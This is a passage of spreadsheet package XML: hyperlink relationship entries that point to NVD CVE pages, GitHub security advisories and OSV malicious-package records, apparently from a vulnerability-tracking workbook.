Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81011" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89012" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89245" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89251" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89252" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89443" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89571" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89593" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89596" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89608" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89639" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89640" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89691" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89705" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89731" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90445" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90447" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90448" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85083" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89456" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89459" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59148" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59151" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59971" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59973" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61534" TargetMode="External" Id="rId585" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet5.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460"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85706" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63073" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84390" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75803" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84645" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84648" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84650" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72708" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81532" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89099" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14457" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54874" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63072" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63075" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63076" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68497" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84652" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50025" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89261" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89263" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15439" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54248" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84651" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81533" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63074" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86224" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62088" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89298" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78547" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78455" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84646" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54513" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59971" TargetMode="External" Id="rId77" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11746" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11745" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48059" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-78fp-cf4h-g36p" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71348" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71357" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-8mc5-7w9m-fqv6" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-fcqg-3mwf-cfcf" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-fh2f-24rh-r2vq" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-qvp4-q2p5-22gg" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44914" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11748" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54665" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71351" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-vfm7-4h43-gp6m" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44911" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-62198" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-66336" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71378" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13676" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39835" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40983" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40984" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48043" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54513" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56340" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56665" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56666" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56825" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56826" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56827" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56828" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56829" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56830" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56831" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59148" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59149" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59151" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59971" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59973" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61534" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16139" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16126" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16127" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16128" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16129" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16130" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16131" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16132" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16133" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16134" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16135" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16136" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16137" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16138" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16140" TargetMode="External" Id="rId56" /><Relationship 